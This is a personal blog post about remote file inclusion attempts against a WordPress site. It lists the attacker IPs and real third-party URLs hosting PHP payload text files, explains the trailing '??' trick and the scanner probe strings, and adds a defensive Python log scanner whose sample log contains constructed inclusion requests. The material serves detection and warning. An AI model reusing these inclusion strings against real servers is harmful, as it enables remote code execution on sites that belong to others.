Two days running... I post a link on Twitter and guess what? I immediately visit the stats page to review how the posting went and, presto, I have two IPs visiting very strange "URLs" on my site. The request showed up as my URL followed by =http://www.americinn.com//email-images/images/AinuLid1.txt?? I changed the 1 to a 2 and found yet another file. Both were remote file inclusion (RFI) attempts against PHP: the trailing ?? is there so that anything the vulnerable script appends to the parameter (a ".php", for instance) lands in the remote query string and is ignored, while the .txt file holds the PHP code the attacker wants my server to execute. Americinn was being used as a third-party host for the payload. Sad thing, their site probably stores personal information in databases and/or files, so be wary if you are signing up online.
Anyway, following the Americinn URL takes you to the classic die("FeeLCoMz"); test file, the standard probe used by RFI scanners: if the word FeeLCoMz shows up in your page, the include worked and your site is vulnerable. So the first file did nothing but check for an entry point. The second file is the real problem. Once a site is confirmed vulnerable, whoever collected that result can include the second file to run their own code on your server and get back in whenever they want. Of course the host site is guilty of nothing more than being the host; a compromised third-party site is just a convenient place to park the payload. I contacted both locations that contained the files. Kul has already removed the files. Hopefully they also removed the plug-ins that allowed their site to be hacked and changed every password on the site. Links and more coming up -->
The biggest heads-up I can give you is to keep a vigilant watch on your access logs. Look for requests whose query string carries another site's URL (something=http://...), particularly ones ending in ?? or pointing at a .txt file; those are inclusion attempts whether or not they worked, and a 200 response on a page that should never take a URL as a parameter deserves a closer look. If you are under attack, beware of using FTP: it sends your password in cleartext, so use SFTP or FTPS instead. Check the dates when your HTML and PHP files were modified and compare them against your last legitimate edit; a file touched on a day you did not deploy anything is the first one to open.
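To make the log-watching advice concrete, here is a small scanner, added here as an example (not code from the original post or from WordPress), that reads Apache combined-format access log lines and flags query parameters whose value is a remote URL, the signature of the inclusion attempts described above. The log lines, IPs, host names and paths in it are constructed for illustration and are not entries from this site's log. It only inspects the request target, never the referer, because legitimate referers carry URLs all the time.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample lines in Apache "combined" log format. The IPs, host
# names and paths are illustrative assumptions, not entries copied from the
# post. Line 3 is a normal page view (its referer carries a URL, which must
# NOT trip the check); the other three are inclusion attempts.
SAMPLE_LOG = """\
203.0.113.10 - - [12/Mar/2010:10:01:22 +0000] "GET /index.php?page=http://host-a.example//images/id1.txt?? HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.10 - - [12/Mar/2010:10:01:25 +0000] "GET /wp-content/themes/demo/header.php?theme_path=http://host-b.example/id.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Mar/2010:10:02:01 +0000] "GET /about/ HTTP/1.1" 200 4096 "http://www.example.com/" "Mozilla/5.0"
198.51.100.7 - - [12/Mar/2010:10:02:05 +0000] "GET /go.php?url=http%3A%2F%2Fhost-c.example%2Fshell.txt%3F%3F HTTP/1.1" 200 30 "-" "libwww-perl/5.8"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def classify_value(value):
    """Return None for a benign parameter value, else 'high' or 'medium'.

    Any absolute URL in a query parameter is worth a look ('medium'). Two
    tells push it to 'high': a trailing '?' (the attacker wants whatever the
    vulnerable include() appends, such as '.php', to land in the remote
    query string and be ignored) or a payload that is a bare .txt file
    (PHP source served as text so the hosting server does not execute it;
    the victim server does).
    """
    if not REMOTE_URL_RE.match(value):
        return None
    remote = value.rstrip('?').split('://', 1)[1]
    remote_path = remote.split('?', 1)[0]
    if value.endswith('?') or remote_path.lower().endswith('.txt'):
        return 'high'
    return 'medium'


def payload_host(value):
    """Host name of the third-party site that is serving the payload."""
    return value.split('://', 1)[1].split('/', 1)[0]


def scan_log(text):
    """Parse combined-format log text and return one finding per RFI-style
    parameter value found in a request target."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        _path, _, query = m.group('target').partition('?')
        for name, value in parse_qsl(query, keep_blank_values=True):
            confidence = classify_value(value)
            if confidence is None:
                continue
            findings.append({
                'line': lineno,
                'ip': m.group('ip'),
                'param': name,
                'payload_host': payload_host(value),
                'confidence': confidence,
                'status': int(m.group('status')),
                'ua': m.group('ua'),
            })
    return findings


def summarize(findings):
    """Map each attacking IP to the sorted list of payload hosts it used:
    the same "IP -> sites hosting the hack files" list kept in this post."""
    by_ip = {}
    for f in findings:
        by_ip.setdefault(f['ip'], set()).add(f['payload_host'])
    return {ip: sorted(hosts) for ip, hosts in by_ip.items()}


if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['ip']} -> {f['payload_host']} "
              f"via ?{f['param']} [{f['confidence']}, HTTP {f['status']}]")
    print(summarize(scan_log(SAMPLE_LOG)))
```

Run it against a real log with scan_log(open("access.log").read()). A 'medium' hit is not proof of anything (redirect and "next page" parameters legitimately carry URLs), which is why the status code and the user agent are kept in each finding: a 200 on a script that should never accept a URL, or a scanner-style user agent, is what turns a hit into something worth acting on.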
Here are the two locations that hosted the files run against my site:
http://www.americinn.com/
http://www.americinn.com//email-images/images/AinuLid1.txt??
http://www.americinn.com//email-images/images/AinuLid2.txt??
Visit at your own risk.
http://www.kul.pl/21.html
http://muzykologia.lublin.pl/templates/system/id1.txt
http://muzykologia.lublin.pl/templates/system/id2.txt
Visit at your own risk.
The trackback on this IP led me to this site: http://www.maruwakorea.com/technote7/board.php?board=maruwa.
Addendum: After this article went out on Twitter we had a visit from 118.217.216.132 (OASYSSTORY Intranet), using www.howtolisten.kr and www.snusoft.ru as hosts for their vile work. I am assuming I pissed some kid off by posting on Twitter about the earlier hack. They tried something a little different, die("Jatimcom");, but it is pretty much the same type of attack: a different scanner's probe string, same remote file inclusion. He/she was pretty relentless. Must be sitting on Twitter picking on sites that mention hackers. Oh well! He is helping out WordPress by finding security gaps and providing me with a few hits. =)
The access log just posted 8 more entries, several of them duplicates. You can view his IP and the sites where he is currently hosting his hack files:
118.217.216.132 – http://snusoft.ru//administrator/components/com_remository/id.txt?? Mozilla/5.0
118.217.216.132 – http://www.howtolisten.kr/lct/exam3/111/id1.txt???? Mozilla/5.0
Visit at your own risk.
Anybody have a fly swatter or a better hacker? I am all about Zen and peace, but... If we disappear offline for a few days, you will understand why. =) Are the kids in Korea that dang bored? Where are the internet police when you need them? As other dangerous IPs pop up, I will add them to the list. Feel free to share your "adventures."
Stay alert and Happy Coding! Z
Tags: hack, PHP, spam, Theme, WordPress